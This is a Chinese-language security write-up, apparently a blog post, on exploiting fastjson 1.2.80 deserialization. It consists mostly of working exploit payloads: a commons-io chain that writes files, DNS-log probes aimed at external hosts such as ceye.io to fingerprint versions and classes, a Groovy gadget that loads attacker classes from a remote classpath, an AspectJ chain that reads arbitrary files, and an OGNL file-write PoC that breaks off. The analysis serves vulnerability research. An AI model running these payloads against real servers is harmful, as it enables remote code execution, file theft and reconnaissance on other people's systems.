aaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...aaaaaa...\"\n" +                "  },\n" +                "  \"charsetName\":\"UTF-8\",\n" +                "  \"bufferSize\":1024\n" +                "  },\n" +                "  \"branch\":{\n" +                "  \"@type\":\"java.lang.AutoCloseable\",\n" +                "  \"@type\":\"org.apache.commons.io.output.WriterOutputStream\",\n" +                "  \"writer\":{\n" +                "  \"@type\":\"org.apache.commons.io.output.FileWriterWithEncoding\",\n" +                "  \"file\":\"C:\\\\Users\\\\16366\\\\Desktop\\\\1.txt\",\n" +                "  \"encoding\":\"UTF-8\",\n" +                "  \"append\": false\n" +                "  },\n" +                "  \"charsetName\":\"UTF-8\",\n" +                "  \"bufferSize\": 1024,\n" +                "  \"writeImmediately\": true\n" +                "  },\n" +                "  \"trigger\":{\n" +                "  \"@type\":\"java.lang.AutoCloseable\",\n" +                "  \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\n" +                "  \"is\":{\n" +                "  \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\n" +                "  \"input\":{\n" +                "  \"$ref\":\"$.input\"\n" +                "  },\n" +                "  \"branch\":{\n" +                "  \"$ref\":\"$.branch\"\n" +                "  },\n" +                "  \"closeBranch\": true\n" +                "  },\n" +                "  \"httpContentType\":\"text/xml\",\n" +                "  \"lenient\":false,\n" +                "  \"defaultEncoding\":\"UTF-8\"\n" +                "  },\n" +                "  \"trigger2\":{\n" +                "  \"@type\":\"java.lang.AutoCloseable\",\n" +                "  \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\n" +                "  \"is\":{\n" +                "  \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\n" +                "  \"input\":{\n" +                "  \"$ref\":\"$.input\"\n" +                "  },\n" +                "  \"branch\":{\n" +                "  \"$ref\":\"$.branch\"\n" +                "  },\n" +                "  \"closeBranch\": true\n" +                "  },\n" +                "  \"httpContentType\":\"text/xml\",\n" +                "  \"lenient\":false,\n" +                "  \"defaultEncoding\":\"UTF-8\"\n" +                "  },\n" +                "  \"trigger3\":{\n" +                "  \"@type\":\"java.lang.AutoCloseable\",\n" +                "  \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\n" +                "  \"is\":{\n" +                "  \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\n" +                "  \"input\":{\n" +                "  \"$ref\":\"$.input\"\n" +                "  },\n" +                "  \"branch\":{\n" +                "  \"$ref\":\"$.branch\"\n" +                "  },\n" +                "  \"closeBranch\": true\n" +                "  },\n" +                "  \"httpContentType\":\"text/xml\",\n" +                "  \"lenient\":false,\n" +                "  \"defaultEncoding\":\"UTF-8\"\n" +                "  }\n" +                "  }\n" +                "}";        Object obj = JSON.parseObject(payload);        System.out.println(obj);    }}

fastjson 1.2.80

payload参考

https://github.com/kezibei/fastjson_payload/tree/main/src/test

https://github.com/su18/hack-fastjson-1.2.80

url探测可用payload

{"@type":"java.lang.Exception","@type":"com.alibaba.fastjson.JSONException","x":{"@type":"java.net.InetSocketAddress"{"address":,"val":"1.zj96tn.ceye.io"}}}//小于等于1.2.80{"a":{"@type":"java.lang.Exception","@type":"com.alibaba.fastjson.JSONException","x":{"@type":"java.net.InetSocketAddress"{"address":,"val":"1.zj96tn.ceye.io"}}},"b":{"@type":"java.lang.Exception","@type":"com.alibaba.fastjson.JSONException","message":{"@type":"java.net.InetSocketAddress"{"address":,"val":"2.zj96tn.ceye.io"}}}}//大于1.2.80[  {    "@type": "java.lang.Class",    "val": "java.io.ByteArrayOutputStream"  },  {    "@type": "java.io.ByteArrayOutputStream"  },  {    "@type": "java.net.InetSocketAddress"  {    "address":,    "val": "dnslog"  }}]//小于等于1.2.47[  {    "@type": "java.lang.AutoCloseable",    "@type": "java.io.ByteArrayOutputStream"  },  {    "@type": "java.io.ByteArrayOutputStream"  },  {    "@type": "java.net.InetSocketAddress"  {    "address":,    "val": "dnslog"  }}]//小于或者等于1.2.68

数据探测fastjson

(1)autotype未开启{"@type\":"whatever"} 返回autotype不可用(2)autotype开启(3)利用处理json格式{"ext":"blue","name":{"$ref":"$.ext"}} //后续不会被处理

fastjson回显版本号

版本高一点才可用,不一定能打出来{"@type":"java.lang.AutoCloseable"JSON.parseObject("whatever",Person.class){"@type": "java.lang.AutoCloseable"

探测依赖版本

{"@type":"java.lang.Character"{"@type":"java.lang.Class","val":"com.mysql.jdbc.Driver"}}要求1:autotype开启要求2:autotype支持需要判断的类dnslog探测回显版本(windows不行 不能解析这个格式){"@type":"java.net.Inet4Address", "val":{"@type":"java.lang.String" {"@type":"java.util.Locale", "val":{"@type":"com.alibaba.fastjson.JSONObject",{ "@type": "java.lang.String""@type":"java.util.Locale", "language":{"@type":"java.lang.String" {1:{"@type":"java.lang.Class","val":"class com.mysql.jdbc.Driver"}}, "country":"x.53303f1a.dns.1433.eu.org" }}}

可用类探测

{  "z": {    "@type": "java.lang.Class",    "val": "java.net.http.HttpClient"  }}//需要Class在autotype没拉黑之前使用,根据返回信息来验证{  "x": {    "@type": "java.lang.Character"{  "@type": "java.lang.Class",  "val": "com.mysql.jdbc.Driver"}}//可用类不存在返回空,可用类存在返回报错 can not cast to char, value : class sun.net.www.http.HttpClient{"@type":"java.net.Inet4Address", "val":{"@type":"java.lang.String" {"@type":"java.util.Locale", "val":{"@type":"com.alibaba.fastjson.JSONObject",{ "@type": "java.lang.String""@type":"java.util.Locale", "language":{"@type":"java.lang.String" {1:{"@type":"java.lang.Class","val":"class com.mysql.jdbc.Driver"}}, "country":"x.53303f1a.dns.1433.eu.org" }}}//dnslog探测,复现失败找不到主机,但是异常中会包含存在的类的信息,不存在则为空

gadget分析

(1)groovy

payload

{    "@type":"java.lang.Exception",    "@type":"org.codehaus.groovy.control.CompilationFailedException",    "unit":{}}

{    "@type":"org.codehaus.groovy.control.ProcessingUnit",    "@type":"org.codehaus.groovy.tools.javac.JavaStubCompilationUnit",    "config":{     "@type":"org.codehaus.groovy.control.CompilerConfiguration",     "classpathList":"http://127.0.0.1:9999/"    }}

选择他的原因是感觉可能利用性多一点,先来看怎么打

写一个恶意类,然后修改

\META-INF\services\org.codehaus.groovy.transform.ASTTransformation文件,发送payload

分析

国际惯例,在漏洞触发点下一个断点,看看大概的行走流程,这里我通过跟踪,最后在ASTTransformationVisitor#addPhaseOperationsForGlobalTransforms下了一个断点

调用栈贴出来如下

doAddGlobalTransforms:280, ASTTransformationVisitor (org.codehaus.groovy.transform)addGlobalTransforms:190, ASTTransformationVisitor (org.codehaus.groovy.transform)addPhaseOperations:154, ASTTransformationVisitor (org.codehaus.groovy.transform)<init>:203, CompilationUnit (org.codehaus.groovy.control)<init>:120, CompilationUnit (org.codehaus.groovy.control)<init>:48, JavaStubCompilationUnit (org.codehaus.groovy.tools.javac)newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)newInstance:62, NativeConstructorAccessorImpl (sun.reflect)newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)newInstance:422, Constructor (java.lang.reflect)deserialze:1039, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)deserialze:291, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)deserialze:287, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)deserialze:828, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)deserialze:291, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)deserialze:287, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)parseObject:405, DefaultJSONParser (com.alibaba.fastjson.parser)parse:1430, DefaultJSONParser (com.alibaba.fastjson.parser)parse:1390, DefaultJSONParser (com.alibaba.fastjson.parser)parse:181, JSON (com.alibaba.fastjson)parse:191, JSON (com.alibaba.fastjson)parse:147, JSON (com.alibaba.fastjson)parseObject:252, JSON (com.alibaba.fastjson)main:28, test

看代码其实挺简单,就是去classloader加载传入的transformNames类,其中限制需要存在GroovyASTTransformation注解,所以我们的poc中有注解,然后我们需要寻找到transformNames是如何传入的

在ASTTransformationVisitor中doAddGlobalTransforms,有以下代码,大概意思就是说会从META-INF/services/org.codehaus.groovy.transform.ASTTransformation去读取每一行,如果没有#(真正类名),就将他put到transformNames中去了。

如以下就会把e0mlja类put进去

GroovyClassLoader

他是URLClassLoader的子类,可以通过CompilerConfiguration类来实现相关的配置

而根据调用栈,我们发现config可以在JavaStubCompilationUnit实例化的时候进行配置,这也就是我们poc的书写原因。最后在ProcessingUnit#setClassLoader调用进去,传入了。

aspectj 任意文件读取

payload

{   "@type":"java.lang.Exception",   "@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"}//第一次   {      "@type":"java.lang.Class",      "val":{         "@type":"java.lang.String"{      "@type":"java.util.Locale",      "val":{         "@type":"com.alibaba.fastjson.JSONObject",{      "@type":"java.lang.String"      "@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException",      "newAnnotationProcessorUnits":[{}]   }}}// 第二次   {      "x":{         "@type":"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit",         "@type":"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",         "fileName":"c:\\windows\win.ini"      }   }//第三次1{    "@type":"java.lang.Character"    {        "c":{            "@type":"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit",            "@type":"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",            "fileName":"c:/windows/win.ini"    }}//第三次2 报错回显

commons-io写文件

import com.alibaba.fastjson.JSON;import com.alibaba.fastjson.parser.ParserConfig;import jdk.nashorn.internal.parser.JSONParser;

public class demo {    public static void main(String[] args) {        String code = "test";        for (int i = 0; i < 8200; i++) {            code += "a";        }        String poc2 = "    \r\n"                + "    {\r\n"                + "  \"su14\": {\r\n"                + "    \"@type\": \"java.lang.Exception\",\r\n"                + "    \"@type\": \"ognl.OgnlException\"\r\n"                + "  },\r\n"                + "  \"su15\": {\r\n"                + "    \"@type\": \"java.lang.Class\",\r\n"                + "    \"val\": {\r\n"                + "      \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"                + "      {\r\n"                + "        \"@type\": \"java.lang.String\"\r\n"                + "        \"@type\": \"ognl.OgnlException\",\r\n"                + "        \"_evaluation\": \"\"\r\n"                + "      }\r\n"                + "    },\r\n"                + "    \"su16\": {\r\n"                + "      \"@type\": \"ognl.Evaluation\",\r\n"                + "      \"node\": {\r\n"                + "        \"@type\": \"ognl.ASTMethod\",\r\n"                + "        \"p\": {\r\n"                + "          \"@type\": \"ognl.OgnlParser\",\r\n"                + "          \"stream\": {\r\n"                + "            \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"                + "            \"delegate\": {\r\n"                + "              \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"                + "              \"reader\": {\r\n"                + "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"                + "      \"is\":{\r\n"                + "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"                + "        \"input\":{\r\n"                + "      \"@type\":\"org.apache.commons.io.input.ReaderInputStream\",\r\n"                + "      \"reader\":{\r\n"                + "        \"@type\":\"org.apache.commons.io.input.CharSequenceReader\",\r\n"                + "        